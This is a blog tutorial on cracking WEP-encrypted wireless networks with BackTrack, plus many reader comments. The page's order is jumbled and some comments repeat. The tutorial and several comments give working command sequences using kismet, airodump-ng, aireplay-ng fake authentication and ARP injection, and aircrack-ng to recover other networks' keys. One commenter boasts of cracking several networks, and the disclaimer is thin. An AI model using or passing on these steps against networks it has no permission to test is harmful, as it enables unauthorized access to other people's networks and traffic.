Kismet is not where the above instructions say it is, and when I go into a Konsole and type “kismet,” I get an error message. I have tried BT2 on both live CD and installed to hard disk. This distro is head and shoulders above all others for running wifi cards, so I am frustrated not to be able to put it to work.
25.
Oct 1st, 2007
Ryan
Alf: I believe BT2 uses kismet-ng not kismet at the command line. You can also use start-kismet-ng to automatically configure your wireless card to run in monitor mode. Hope that helps
26.
Oct 1st, 2007
tiger
hi there, thank you great great tut ..just one ques …when i start the live cd from my brother dell laptop it works just fine ..but when i try to start it from my 2Gh AMD hp pavilion laptop it frezz
after the boot word comes then i click enter then you see 2 lines getting initialized after that nothing happens just blank screen any idea
thanks much …….
27.
Oct 14th, 2007
bob
how do you find the mac address of the access point
28.
Oct 20th, 2007
Ryan
@tiger: you need to check your startup logfile to identify the problem, I think its located somewhere around /boot/init.
@bob: kismet typically detects the mac of the AP.
29.
Oct 25th, 2007
hotspotter
I found great hack (Windows, Linux) tutorials at http://airdump.net
30.
Oct 28th, 2007
snoop911
My wifi card’s model # isnt listed in the supported/unsupported list… anyone been successful using:
Gigabyte’s GN-WP01GS PCI Wireless Adapter
If not, I’d still love to play with this stuff… can anyone recommend a *cheap* wifi adapter that Backtrack has been tested to work on something like a Intel Core 2 Duo Processor E6600 / Asus P5N-E SLI motherboard ??
Would be nice if there was a usb adapter that was supported, then everyone could just get that one regardless of their computer config (PCI/PCIexpress/cardbus/mac/windows/etc)!
Thanks!
31.
Oct 31st, 2007
acoenoc
great tutorial :) thanks. I made a specific tutorial for use with SLAX and WL-167g adapter, based on this tutorial.
32.
Oct 31st, 2007
Diskbox
Hi Ryan
Awesome write-up. Just what I’ve been looking for for ages.
I get as far as aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0 but with my details in and after it’s sent five authentication tries it files with “Attack was unsuccessful. Possile reasons:”……
I’ve checked and everything looks like it correct. I changed belkin to the name shown in kismet, the MAC addresses are right (I think) and ath0 was changed to eth1.
What am I doing wrong?
33.
Nov 1st, 2007
Ryan
eth1 sounds like an ethernet port not a wireless device.
34.
Nov 19th, 2007
Lee
First off, I’m a total linux noob.
It looked like I could follow this guide, but I became stuck very quickly when I couldn’t load kismet or aircrack. I downloaded BackTrack 2 from remote-exploit.org but I don’t think those apps are in the iso.. Can someone please confirm this?
Also, where the bloody hell is the file manager in BT2?
Without an http mirror for the original BackTrack (v1.0) I can’t get hold of it (can’t use ftp). Does anyone have a link?
Thanks.
35.
Nov 20th, 2007
David
Nope, they are in BackTrack 2 - I’ve got it running right next to me now :)
Try running startx after you log in, this will start up the desktop and then you can find what you need in the Applications / BackTrack / Radio Network Analysis / 80211 / xxx. Kismit is in Analyser (or all) and airodump / replay / crack etc are in Cracking / Aircrack (or, all).
Hope that helps!
36.
Dec 1st, 2007
Alex
help guys, when i try to login, every letter is shown twice on screen
so i get
rroooott
what do i do?
37.
Dec 4th, 2007
DieHard1492
Thanks for this great tutorial. I am currently in Backtrack. I found Kismet in the start menu, the app loads (I see a terminal-style window with a blinking cursor and a resolution size 103×34) but then it almost immediately disappears.
It is not minimized. It is just gone.
I tried to load Airodump to see what happens and that app stays open.
Any idea why the Kismet app window disappears / closes / ends?
38.
Dec 7th, 2007
xtrewt
i made a live cd of backtrack2 on a CD-RW using iso recorder and nero burning rom. i booted it and when it gets to the login, i follow the instructions.
Username:root
Password:toor
i get invalid login. i tried reburning it and same thing, no go.
im using windowsxp sp2 sony vaio laptop with a LINKSYS wifi card.
thanks
39.
Dec 10th, 2007
greekgod
Hi Ryan,
I had the exact same problem as xtrewt. First of all I d/l the iso file which appared to be 689 MB or something like that, however after the d/l finished I saw the iso image was just 410 ish MB but it said the d/l was complete. I burnt the image and when booted and when asked for bt login and password I get an invalid login (root and toor login and password respectively)
PLZ HELP ANY ONE!!!
40.
Dec 17th, 2007
mailerr
So download from another mirror.
What about google? Type backtrack 2 download :)
Or maybe backtrack 3? :))
41.
Jan 9th, 2008
galinthias
everything worked great for me, but i was just wondering what exactly i can do with their wep key once i get it, i mean can i decode it to get their actual password or something so i could then just connect to it using my vista computer if possible, or what other things could be done with it, sorry im a total noob
42.
Jan 11th, 2008
Wireless problems
Thanks for tutorial! :)
Could you awnser if “intel(r) wireless WiFi link 4965AGN #3″ is compatible with backtrack?
thanks
if not… what’s the best wireless card for a asus G1?
43.
Jan 11th, 2008
Ryan
hey xtrewt and greekgod… maybe try downloading from a different mirror? I haven’t run into this problem myself. Anyone else having this same problem?
44.
Jan 11th, 2008
Nikko
Hello Ryan, I’m Using backtrack 2 and im stuck on the first step with kismit. I see all the APs around my house but how do i view the MAC address of one of them? Under Network List (Autofit) they are all there but i dont know what to type and where or if i can click on anything… im a linux challenged noob as well.
45.
Jan 11th, 2008
Nikko
nvm i figured out that sQ thing…
46.
Jan 11th, 2008
Nikko
okay im stumped. it seems like my adapter stops working after about 3 or 4 minutes. the packets per second number goes to zero in kismet and the mac addresses in airodump begin to disappear one by one.
Then when i close all the windows and open kismet again, it now lists 5 adapters for me to choose from (wifi0, ath0, ath1, ath2, kis) when before there were just 2 (wifi0, ath1).
No matter which one i choose it eventually says the same “fatal” error and closes the window itself. only way to get it working again is to reboot.
any thoughts??? i am using a listed netgear wpn311 desktop adapter.
47.
Jan 18th, 2008
chomper
Does anyone know why kismet closes as soon as you select a card to use. Windows pops up for a split-second and then disappears.
48.
Jan 20th, 2008
polo
nice tutorial…
i want to ask something:
1, how can we resume capture file(ivs) with airodump-ng?
is there any spesific command i must type in?
in backtrack2, when i run:
airodump-ng –ivs -w test -c 1 ra0
then press Ctrl-C,
then i want to resume, but when i run the same command, i
got test-01 file name saved instead test.
or, can we combine it?
2. how do i set my wireless card with kismet?
on /etc/kismet.conf, i replace the line :
source=rt61,ra0,d-link
then i run kismet,but got error…
it says:
Server options: none
Client options: none
Starting server…
Waiting for server to start before starting UI…
Suid priv-dropping disabled. This may not be secure.
No specific sources given to be enabled, all will be enabled.
Enabling channel hopping.
Enabling channel splitting.
FATAL: Unknown capture source type ‘rt61′ in source ‘rt61,ra0,d-link’
my card is d-link dwl g-510, with rt61 driver…
i know this driver when i run airmon-ng ra0
and it says, it support for monitor mode…
is my card support for this?
or is my kismet’s config wrong?
can anybody tell what i should do?
thx for attention…
49.
Jan 21st, 2008
The Real NeO
Hey there love the tutorial best one i have ever seen
A+
50.
Jan 23rd, 2008
ShahZ
Dear Ryan,
First of all, wonderful tute! Easy to follow too! I have an issue here though. Instead of ath0, I get only eth1. Yes, as mentioned above, it’s an ethernet controller. But I proceeded, and managed to get packets. But I didnt get any ARP even after 400k packets reading. And packets sent were always 0 too. It was all working fine till that step. Managed to use Kismet and get my network listed, airodump was graceful too, and I believe I managed to associate my aireplay with my network. But that was it. No ARPs found. The speed was slow too. Took me about 12 hours to reach 400k packets.
What should I do? Use a PCMCIA WLAN? Get a USB WLAN dongle? or its just something that Im missing here?
Regards,
ShahZ
51.
Jan 23rd, 2008
John Dunks
Hi
Thanks for the tutorial. ive got as far as step 2
but Airodump says No interface specified.
could you tell me where do i specify interface for Airodump?
I have search everywhere on http://aircrack-ng.org for anything about how to config ( specify interface ) and cant find anything its really got me locked down here, i cant move forward. please help, also if you tell me where i specify interface please tell me the format it should look like, eg: for kismet i had to set the capture source and the format was source=ipw3945,wlan0,6
(type, interface, chanel)
please help :)
john
52.
Jan 23rd, 2008
John Dunks
Hey Shahz
I am not an expert but it looks like you have set up kismet source wrong. it goes like this
source=type,interface,name[,channel]
you said yours is:
source=rt61,ra0,d-link
change the last part d-link for the chanel you are using/scanning. kismet should work now.
how did you find out how to config or specify interface on airodump mate?
53.
Jan 23rd, 2008
ShahZ
Heya John,
you actually replied for polo :D
on airodump, just type
airodump-ng -h
and the help section pops out. That’s where I followed before typing the whole string.
Interface can be set in airmon if you wish. What matters is, the wireless device must be in monitor mode.
Hope that helped you..Anyone else can help me? Wonder where is Ryan..
54.
Jan 23rd, 2008
Ryan
Hi Shah - I’ve had some strange results like that as well testing this method. I really don’t have an answer why it happens… you could be too far away from the AP, I’m not really sure.
55.
Jan 23rd, 2008
John Dunks
Hi Ryan, John again..
Ive got to step 3 and 4 now
can you clarify about step 3. after i put the string in, what should happen in the window?
On mine it simply tells me how to get help. “aireplay-ng –help”
IS this right? ive checked my code a few times.. im sure its right. the target SSID has spaces in it, i wonder if thats causing a problem.
my string for step 3 is:
aireplay-ng -1 0 -e LINKSY IS WIFI -a 00:01:4a:05:21:a1 -h 00:1b:77:8c:23:a3 wlan0
The reason that i dont think Step 3 has gone right is because on step 4 it says that it Reads 2015 packets, but doesnt pick up any ARP requests and 0 ACKs
?
please help if you can?
56.
Jan 24th, 2008
ShahZ
In order to obtain ARP, is it important for the wireless network to be running activities (other clients connected to it)? My ethernet controller isnt really listed in the compatibility list, but surprisingly, the mac address was obtained succesfully, and the wireless worked seemlessly. Just no ARPs recieved. On the other test laptop which was using Atheros wireless ethernet controller, BackTrack didnt identify it and it didnt loaded at all. I’m stuck here really. Wonder where’s the flaw.
57.
Jan 25th, 2008
Ryan
I believe if there aren’t any other clients accessing, you won’t receive any ARPs to capture and inject. You can fake auth, but if there is mac filtering enabled on the router and no other client accesses it for example, an ARP wouldn’t be generated to capture and inject. Don’t quote me on that, been a long time since I messed with this.
58.
Jan 26th, 2008
ShahZ
haha..I dont really see a point for enabling Mac filtering WITH WEP protection..That’s really pointless..hehe..Only one last question Ryan, did you use a USB wireless adapter or a PCI/built in adapter?
59.
Jan 27th, 2008
shawha
Linux WEP hacking Noob.
I was able to successfully crack my home 128 bit 64 hex wep encrypted wireless network. Here is what I did:
First of all I used BAcktrack 3.
I mainly followed the instructions above which were very helpful and explained alot.
opened start/internet/wireless asistant
located the ap I wanted and its channel #
first ran kismet
open terminal
run start-kismet-ng
choose wifi0
verify iwconfig -should have ath0 “managed” and ath1 “monitor”
iwconfig ath1 rate auto
airodump-ng –ivs -w /mnt/sda1/aircrack/temp01 –channel 10 ath1
macchanger -s ath1
copy my wireless mac address
aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:11:22:33:44:55 ath1
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:11:22:33:44:55 ath1
aircrack-ng -s /mnt/sda1/aircrack/test1-01.ivs
waited 3 minutes found wep key
I manually typed it at first and it did not work.
Copied it to kedit removed the colons and copy and pasted and it worked!
60.
Jan 28th, 2008
Ryan
My Toshiba laptop has a built in Atheros chipset wireless adapter. Worked out of the box.
61.
Feb 5th, 2008
Ivan
NIKKO! I am having the same issue like yours did you get any help on this ??
okay im stumped. it seems like my adapter stops working after about 3 or 4 minutes. the packets per second number goes to zero in kismet and the mac addresses in airodump begin to disappear one by one.
Then when i close all the windows and open kismet again, it now lists 5 adapters for me to choose from (wifi0, ath0, ath1, ath2, kis) when before there were just 2 (wifi0, ath1).
No matter which one i choose it eventually says the same “fatal” error and closes the window itself. only way to get it working again is to reboot.
any thoughts??? i am using a listed netgear wpn311 desktop adapter.
62.
Feb 5th, 2008
Ivan
Sorry I am using a Neatgear WG511T it has an Atheros chipset
not wpn311
63.
Feb 16th, 2008
Nikko
I have no idea ivan, I’m still trying to figure it out. Any thoughts ryan, I am now trying to crack with a listed dlink wda-2320 and it stops working after about 10 minutes or so. Could it be my motherboard or something?
I’m going to install the card on my old dell and try it from there, the other thing i have not tried is backtrack ver 1. I’ve been using ver 2 and 3. Anybody, same issues as us???
64.
Feb 19th, 2008
Daniel
Hi all,
when i use ‘aireplay-ng -1 0 …’ no matter what -h mac address i use i always get:
The interface MAC (00:00:00:00:00:00) doesn’t match the specified MAC (-h).
ifconfig eth1 hw ether 00:18:DE:D4:BF:10
23:55:17 Waiting for beacon frame (BSSID: 00:13:10:4A:6F:ED) on channel 6
23:55:17 Sending Authentication Request (Open System)
23:55:19 Sending Authentication Request (Open System)
……………………………………
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn’t support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You’re too far from the AP. Get closer, or lower
the transmit rate.
where the mac at line:
ifconfig eth1 hw ether 00:18:DE:D4:BF:10
is the mac i typed as -h. Whatever i use as mac i get same error, no matter is a real client or a mac i invented…
Any ideas?
Pls help me, i am stuck on it.
Thanks,
Dani.
65.
Mar 6th, 2008
Steve
Awesome post for newbies. Thanks so much. One question: is it even possible to perform these tasks without writing to a disk? I don’t feel like partitioning my drive right now. Again, thanks!
66.
Mar 9th, 2008
Zanxyou
I try it several times and it doesen’t work! if i create files, they desapear and i can not find them. maybe u must explain what kind of cfg u put in before u start with the whole thing…. or maybe im to stupid or just a noob… :)
…nice tutorial…
67.
Apr 2nd, 2008
raultsu
i got all the steps to work but it takes a long time for me to collect ivs. it took about an hour to collect 2000. what am i doing wrong?
68.
Apr 8th, 2008
kivi
hey i have a major problem, i cant even get past step 1…..i cant open kismet. I am using bt3 boot from the disk. I have an intel(R) wireless wifi link 4965. when i try to open kismet it just doesnt go. Can someone please help????
If someone is kind enough to guide me through the process please reply to this post or email me at kivi12k@aol.com
69.
Apr 20th, 2008
Jeff
Letting you know that I just stumbled this article
70.
Apr 28th, 2008
fraggyy
hi there.I have the exact same problem with daniel.to tell u the truth i have not yet figured out clearly whether the second mac adress should be the one of MY wireless card ,or the CLIENT’S mac adress,who is connecting to the rooter(AP)anybody can help?
71.
May 10th, 2008
startx problem
Hi there I’m having the same problem as Andrew
“type : startx
and it says:
-bash: bt: command not found
Can you help me ?
Thx a lot!”
but instead it says something about server x or something..
Ryan help me please :) :)
72.
May 10th, 2008
Da Boss
Great tutorial man…
I’m real nu to all tis tho but yo tutorial made alot clear…
I jus have tis question tho… which part of the screen can I get the Channel # an I use a Dell Inspiron 6400 with the Brodcom wireless card 4311 which is in the list but I cant manage to find the name of my wireless Adapter nor the Mac address even after runnin iwconfig…
I jus get somtin lyk this “eth1″. Is this the name of my card????// Help pls…
73.
May 10th, 2008
startx problem
My startx 100% doesn’t work but flux does :S any clearer?
~(btw I am using live cd burnt to a cd, booted beforew I get in windows)
I tried just using the terminal I get after loging in succefully as root and toor, but it doesn’t recognise the promt
“kismet”
Thanks in advance
74.
May 25th, 2008
ordico
Hey Kivi, u havta config kismet
go google kismet.conf
75.
Jun 1st, 2008
Ratman
Hi
Ive created a video for you guys to understand easily
http://uk.youtube.com/watch?v=gGMuI2tyuMc
76.
Jun 2nd, 2008
Mark
How do I convert the resulting HEX WEP key into decypherable alphanumeric password (if it is?)
77.
Jun 5th, 2008
ratman
I have made a video. Easy to understand
http://www.youtube.com/watch?v=gGMuI2tyuMc
Follow the instructions in the more info section
78.
Jun 11th, 2008
Mulumba K.
does any one know how to use backtrack 3 or is it the same as this
79.
Jun 18th, 2008
Ezzy
Hi Ryan,
This is a gr8 tut & very easy to understand for begginers.first i had some prob following all the procedure but any how i managed to hack.Thanks for your effort.
80.
Jun 23rd, 2008
Stefan Certic
Great tutorial! Working!
81.
Jul 9th, 2008
Justin
Does any one know if a Dynex DX-BGDTC desktop card will work with backtrack? Or would an HP6710b Laptop built in WIFI work?
82.
Jul 15th, 2008
Ben
Please help with this problem.
Im running backtrack 3 off the cd and that is fine, and i am trying to crack my wep encrypted network. everything works fine except for the packet injection step. i beleive this is because my wireless card is not in monitor mode properly;
bt ~ # airmon-ng start wlan0
Interface Chipset Driver
wlan0 Intel 4965 a/b/g/n iwl4965 - [phy0]
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from hxxp://dl.aircrack-ng.org/iw.tar.bz2
I have downloaded iw but i have no idea how to install it. Im very new to linux. Could someone please help me out? :(
Thanks
83.
Jul 15th, 2008
Ben
Just to correct my other post, my wireless lan adapter is actually an Intel 3945;
Interface Chipset Driver
wlan0 Intel 3945 a/b/g iwl3945 - [phy0]
ERROR: Neither the sysfs interface links nor the iw command is available.
Please download and install iw from http://dl.aircrack-ng.org/iw.tar.bz2
84.
Jul 21st, 2008
sirjune
ifconfig -a shows loopback and eth0 only. i dont have wlan0 or wifi0 or ath0. i suppose eth0 is my LAN port. i have a built-in wifi port on my HP pavillion laptop. how to i get to have the other interfaces?
85.
Jul 25th, 2008
Fred
I am very new to backtrack and linux. I installed backtrack 3 on Toshiba Satellite. Its not asking me for any username or password. The tutorial says to login as root. Please let me know if there is some probs with my installation. please advice
86.
Aug 6th, 2008
alden
does anyone knows how to deal with long essid’s?
For example: James P or Animal House?
And another thing. One of the APs has two bssid’s. Which one to choose and why there are two?
87.
Aug 6th, 2008
jorge
hey sorry to trouble you guys. It seems i get stuck on step 2 I cant open airodump in backtrack3. when i look manually for the files i find airosnarf and airsnort. help me anyone?
88.
Sep 1st, 2008
Sniparx
P.s T0: FRED, It’s all g00d its n0t supp0se t0 ask f0r username 0r passw0rd, 0n s0me things it d0es, but it didn’t either with mine, s0 n0 w0rries it’s all g00d. C0ntinue using the tut0rial and ull get there, but again a easier clearer way t0 see h0w t0d0 it if ur new like me is checking 0ut http://blip.tv/file/930698... h0pe u find it usefull, Btw if everything w0rks like in tut0rial, and it sitll d0es n0t receive Data then y0u p0ssibly need a c0mpatible Wifi, Id suggest the Netgear WG111v2 It w0rks perfect, ive had a Belking 54gb USB it w0rks, but!!! there’ is a slight pr0blem bringing the card back intu m0nit0r m0de after changing mac address. i just skipped that part and used 0riginal mac 0n my WIFI and cracked the WEP key ;D… Evil i have ermm lets see ab0ut 5 netw0rks cracked :D rawr!… fun stuff.
89.
Sep 5th, 2008
josh
do rly need to do an injection to crack the key? because im have alittle trouble trying to hack my network
This tutorial is intended for user's with little or no experience with linux or wifi. The folks over at remote-exploit have released "Backtrack" a tool which makes it ridiculously easy to access any network secured by WEP encryption. This tutorial aims to guide you through the process of using it effectively.
Required Tools
1. You will need a computer with a wireless adapter listed here
2. Download Backtrack and burn it's image to a CD
B. OVERVIEW
BACKTRACK is a bootable live cd with a myriad of wireless and tcp/ip networking tools. This tutorial will only cover the included kismet and aircrack-ng suite of tools.
Tools Overview
* Kismet - a wireless network detector and packet sniffer
* airmon - a tool that can help you set your wireless adapter into monitor mode (rfmon)
* airodump - a tool for capturing packets from a wireless router (otherwise known as an AP)
* aireplay - a tool for forging ARP requests
* aircrack - a tool for decrypting WEP keys
* iwconfig - a tool for configuring wireless adapters. You can use this to ensure that your wireless adapter is in "monitor" mode which is essential to sending fake ARP requests to the target router
* macchanger - a tool that allows you to view and/or spoof (fake) your MAC address
Glossary of Terms
* AP: Access Point: a wireless router
* MAC Address: Media Access Control address, a unique id assigned to wireless adapters and routers. It comes in hexadecimal format (ie 00:11:ef:22:a3:6a)
* BSSID: Access Point's MAC address
* ESSID: Access Point's Broadcast name. (ie linksys, default, belkin etc) Some AP's will not broadcast their name but Kismet may be able to detect it anyway
* TERMINAL: MS-Dos like command line interface. You can open this by clicking the black box icon next to the start key in backtrack
* WEP: short for Wired Equivalency Privacy, it is a security protocol for Wi-Fi networks
* WPA: short for WiFi Protected Access. a more secure protocal than WEP for wireless networks. NOTE: this tutorial does not cover cracking WPA encryption
Since Backtrack is a live CD running off your cdrom, there is nowhere that you can write files to unless you have a linux partition on your hard drive or a usb storage device. Backtrack has some NTFS support so you will be able to browse to your windows based hard drive should you have one, but it will mount the partition as "read-only". I dual boot windows and ubuntu on my laptop so I already have a linux swap partition and a reiserfs partition. Backtrack had no problem detecting these and mounting them for me. To find your hard drive or usb storage device, just browse to the /mnt folder in the file manager. Typically a hard drive will appear named something like hda1 or hda2 if you have more than one partition on the drive. Alternately hdb1 could show if you have more than one hard disk. Having somewhere to write files that you can access in case you need to reboot makes the whole process a little easier.
C. DISCLAIMER
Hacking into someone's wireless network without permission is probably against the law. I wouldn't recommend doing it. I didn't break into anyone else's network while learning how to do this .
D. IMPLEMENTATION
STEP 1
Monitoring Wireless Traffic With Kismet
Place the backtrack CD into your cd-rom drive and boot into Backtrack. You may need to change a setting in your bios to boot from cd rom. During boot up you should see a message like "Hit ctrl+esc to change bios settings". Changing your first boot device to cdrom will do the trick. Once booted into linux, login as root with username: root password: toor. These are the default username and password used by backtrack. A command prompt will appear. Type startx to start KDE (a 'windows' like workspace for linux).
Once KDE is up and running start kismet by clicking on the start key and browsing to Backtrack->Wireless Tools -> Analyzers ->Kismet. Alternatively you can open a Terminal and type:
kismet
Kismet will start running and may prompt you for your wireless adapter. Choose the appropriate adapter, most likely 'ath0', and sit back as kismet starts detecting networks in range.
NOTE: We use kismet for two reasons.
1. To find the bssid, essid, and channel number of the AP you are accessing.
2. Kismet automatically puts your wireless adapter into monitor mode (rfmon). It does this by creating a VAP (virtual access point?) or in other words, instead of only having ath0 as my wireless card it creates a virtual wifi0 and puts ath0 into monitor mode automatically. To find out your device's name just type:
iwconfig
Which will look something like this:
iwconfig.png
While kismet detects networks and various clients accessing those networks you might want to type 's' and then 'Q' (case sensitive). This sorts all of the AP's in your area by their signal strength. The default 'autofit' mode that kismet starts up in doesn't allow you much flexibility. By sorting AP's by signal strength you can scroll through the list with the arrow keys and hit enter on any AP you want more information on. (side note: when selecting target AP keep in mind this tutorial only covers accessing host AP's that use WEP encryption. In kismet the flags for encryption are Y/N/0. Y=WEP N=Open Network- no encryption 0= other: WPA most likely.) Further reading on Kismet is available here.
Select the AP (access point) you want to access. Copy and paste the broadcast name(essid), mac address(bssid), and channel number of your target AP into a text editor. Backtrack is KDE based so you can use kwrite. Just open a terminal and type in 'kwrite' or select it from the start button. In Backtrack's terminal to copy and paste you use shift+ctrl+c and shift+control+v respectively. Leave kismet running to leave your wireless adapter in monitor mode. You can also use airmon to do this manually. airmon-ng -h for more help with this
STEP 2
Collecting Data With Airodump
Open up a new terminal and start airodump so we can collect ARP replies from the target AP. Airodump is fairly straight forward for help with this program you can always type "airodump-ng -h" at the command prompt for additional options.
airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1
Breaking down this command:
* ath0 is my wireless card
* -w tells airodump to write the file to
/mnt/hda2/ryan/belkin_slax_rcu
* 9 is the channel 9 of my target AP
* 1 tells airodump to only collect IVS - the data packets with the WEP key
STEP 3
Associate your wireless card with the AP you are accessing.
aireplay-ng -1 0 -e belkin -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
* -1 at the beginning specifies the type of attack. In this case we want fake authentication with AP. You can view all options by typing aireplay-ng -h
* 0 specifies the delay between attacks
* -e is the essid tag. belkin is the essid or broadcast name of my target AP. Linksys or default are other common names
* -a is the bssid tag(MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
* -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
* ath0 at the end is my wireless adapters device name in linux
STEP 4
Start packet injection with aireplay
aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 ath0
* NOTES: -b requires the MAC address of the AP we are accessing.
* -h is your wireless adapters MAC addy. You can use macchanger to view and change your mac address. macchanger -s ath0
* if packets are being collected at a slow pace you can typeiwconfig ath0 rate auto to adjust your wireless adapter's transmission rate. You can find your AP's transmission rate in kismet by using the arrow keys up or down to select the AP and hitting enter. A dialog box will pop up with additional information. Common rates are 11M or 54M.
As aireplay runs, ARP packets count will slowly increase. This may take a while if there aren't many ARP requests from other computers on the network. As it runs however, the ARP count should start to increase more quickly. If ARP count stops increasing, just open up a new terminal and re-associate with the ap via step 3. There is no need to close the open aireplay terminal window before doing this. Just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.
If you get a message like this:
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
Just reassociate with the AP following the instructions on step 3.
STEP 5
Decrypting the WEP Key with Aircrack
Find the location of the captured IVS file you specified in step 2. Then type in a terminal:
aircrack-ng -s /mnt/hda2/home/belkin_slax_rcu-03.ivs
Change /mnt/hda2/home/belkin_slax_rcu-03.ivs to your file's location
Once you have enough captured data packets decrypting the key will only take a couple of seconds. For my AP it took me 380k data packets. If aircrack doesn't find a key almost immediately, just sit back and wait for more data packets.
aircrack.png
If this guide doesn't fully answer your questions you can always refer to the forums at remote-exploit.org
url:http://ryanunderdown.com/2007/02/12/cracking-wep-using-backtrack/
91 Comments
1.
Jul 12th, 2007
aquastrike
Great tutorial!
2.
Jul 24th, 2007
Stonkey
Hey, great stuff. Is there somewhere I can download this with the pictures embedded in it and all that?
3.
Jul 25th, 2007
Ryan
I added a print this post option. You might want to print the images seperately.
4.
Jul 31st, 2007
Guanji
WOW.. trust me i have been to thousands of forums and read post but this is by far the most detailed tutorial so far. It looks like you are using ubuntu which is great, I dual boot with windows as well. I am going to use BackTrack to perform this lab test at home as it comes with more security tools. I love ubuntu soon as i change my video card and figure out the dual boot. ATI are pain in the ass.
5.
Jul 31st, 2007
Ryan
Thanks Guanji
I do use Ubuntu on my laptop normally, and i took some of the snapshots from within it. I used backtrack to do the real work though, which is packet injection. I need to update this to work with backtrack 2.0. I should have it done over the weekend.
6.
Jul 31st, 2007
Guanji
Hey you dont have to update the computer when it loads do you? i know there are dependencies so maybe i would need a lan connection? Right now i use an air card for my laptop but im trying to do this on my desktop which is connectionless..
7.
Aug 10th, 2007
Tony
Great how-to! Let me just mention that, in BT2 you can also start Kismet with “start-kismet-ng”. This auto configures kismet.conf and runs Kismet.
8.
Aug 14th, 2007
Ryan
Thanks Tony, I still haven’t had time to test out BT2. Im looking forward to it. The improved support for usb wireless devices should definitely make it more useful for beginners.
9.
Aug 17th, 2007
nym-ph
yeah.. wep crackin’s easy. you just made it even simpler.
great guide, very direct and easy to understand.
10.
Aug 25th, 2007
olva
does this back track have a driver for intel /PRO wireless network device or not ?? because it doesn’t feel my wireless device , i do not know why and what i can do to fix this ?
11.
Aug 26th, 2007
Ryan
the list of compatible wireless adapters can be found here:
http://backtrack.offensive-security.com/index.php?title=HCL:Wireless
12.
Aug 28th, 2007
RW
Hey, great guide, Ryan!
I’ve been doing a lot of googling, and this is the best one I’ve found so far!
13.
Sep 1st, 2007
Wallawallaa
Ryan, thanks for the tutorial but i am having some problems with mine working. it seems like u are a Linux Master and i was wondering if u could help me out. i think my problem is my internet card. i am using the internal one out of my mac book. i just wanted to know what you thought. thanks
14.
Sep 1st, 2007
Ryan
Haha, well thanks, but I am definitely NOT a linux master. It sounds like your card is likely the culprit. The best thing to do is see if your card is on the list of supported cards. If it isn’t, your card won’t be able to do the packet injection necessary for this tutorial to be of any help.
15.
Sep 5th, 2007
benjab
Hey there, Great tutorial… I have backtrack 2 and I can’t tell if my card is compatable. I have an Atheros AR5BMB5 (According to the underside of my Acer aspire 9300 laptop)
Any ideas,… I mean is that the actual name of my card? as I can’t find any mention of it on the compatability list on madwifi
16.
Sep 5th, 2007
Ryan
Hi benjab, your card should be using the atheros chipset which *should* work. Good Luck and let me know!
17.
Sep 11th, 2007
Gozzy
Hi ,
I just tryed your tutirial and after this line i get an error :
unknow command.
airodump-ng ath0 -w /mnt/hda2/home/ryan/belkin_slax_rcu 9 1
I am working from the cd .
18.
Sep 11th, 2007
Ryan
Hmm not sure… maybe the backtrack 2.0 live cd uses regular airodump and not airodump-ng…
you could try
airodump ath0 -w /path/filename
good luck!
19.
Sep 19th, 2007
Justin
Hey Ryan, I love this tutorial, its just detailed enough without being condescending. I’m using backtrack 2 and the commands are quite different (but I’ve figured them out accordingly) so everything seems to be working well, but the IVS collection is slow as hell (100 IVS packets in 45 mins, even though reading and sending packets moves quite fast). I’m using an older Proxim card (the Gold a/b 8460-05) but it’s not on the list, so I’m wondering if you think that may be my problem. Everything seems to work, but it would literally take days to collect enough of the packets I need. Also, I’m cracking my own connection, so it’s in an optimal environment.
And Gozzy, you need you change it up to this:
‘airodump-ng –ivs -w /root/Desktop/ (whatever channel number) ath0′
–ivs tells it only to save the ivs packets, the directory will save it to your desktop and the channel is whatever channel you’re working on. It’s a lot different from backtrack 1.
20.
Sep 19th, 2007
Ryan
Hi Justin,
Ya, this tutorial definitely needs an update… To ask the obvious question: Are you using packet injection with aireplay? Because if you aren’t then it stands to reason that your IV packet collection would be extremely slow. With aireplay spamming arp requests to the access point your IV collection should go very fast. 5-10 minutes max.
EDIT: after re-reading your comment, I think packet injection is failing. I would suspect your card is indeed the problem.
21.
Sep 26th, 2007
joe
Yeah, Backtrack 2.0 uses very different command line options, it was very frustrating.
Also, for some reason I can’t run aireplay, it says cannot execute binary file for some reason… why would it do that? it also does that with standard linux commands like vi or nano stuff like that, weird.
22.
Sep 27th, 2007
Andrew
Hi!
I’m new for BT, I have a little problem. When BT starts, I type in name and pass, after then I type : startx
and it says:
-bash: bt: command not found
Can you help me ?
Thx a lot!
23.
Sep 27th, 2007
Ryan
Hi Joe & Andrew
Are you guys running it off of the live cd? I’m not really sure what’s going on. You might try the forums over at remote-exploit.org.
24.
Sep 30th, 2007
Alf
Kismet is not where the above instructions say it is, and when I go into a Konsole and type “kismet,” I get an error message. I have tried BT2 on both live CD and installed to hard disk. This distro is head and shoulders above all others for running wifi cards, so I am frustrated not to be able to put it to work.
25.
Oct 1st, 2007
Ryan
Alf: I believe BT2 uses kismet-ng not kismet at the command line. You can also use start-kismet-ng to automatically configure your wireless card to run in monitor mode. Hope that helps
26.
Oct 1st, 2007
tiger
hi there, thank you great great tut ..just one ques …when i start the live cd from my brother dell laptop it works just fine ..but when i try to start it from my 2Gh AMD hp pavilion laptop it frezz
after the boot word comes then i click enter then you see 2 lines getting initialized after that nothing happens just blank screen any idea
thanks much …….
27.
Oct 14th, 2007
bob
how do you find the mac address of the access point
28.
Oct 20th, 2007
Ryan
@tiger: you need to check your startup logfile to identify the problem, I think its located somewhere around /boot/init.
@bob: kismet typically detects the mac of the AP.
29.
Oct 25th, 2007
hotspotter
I found great hack (Windows, Linux) tutorials at http://airdump.net
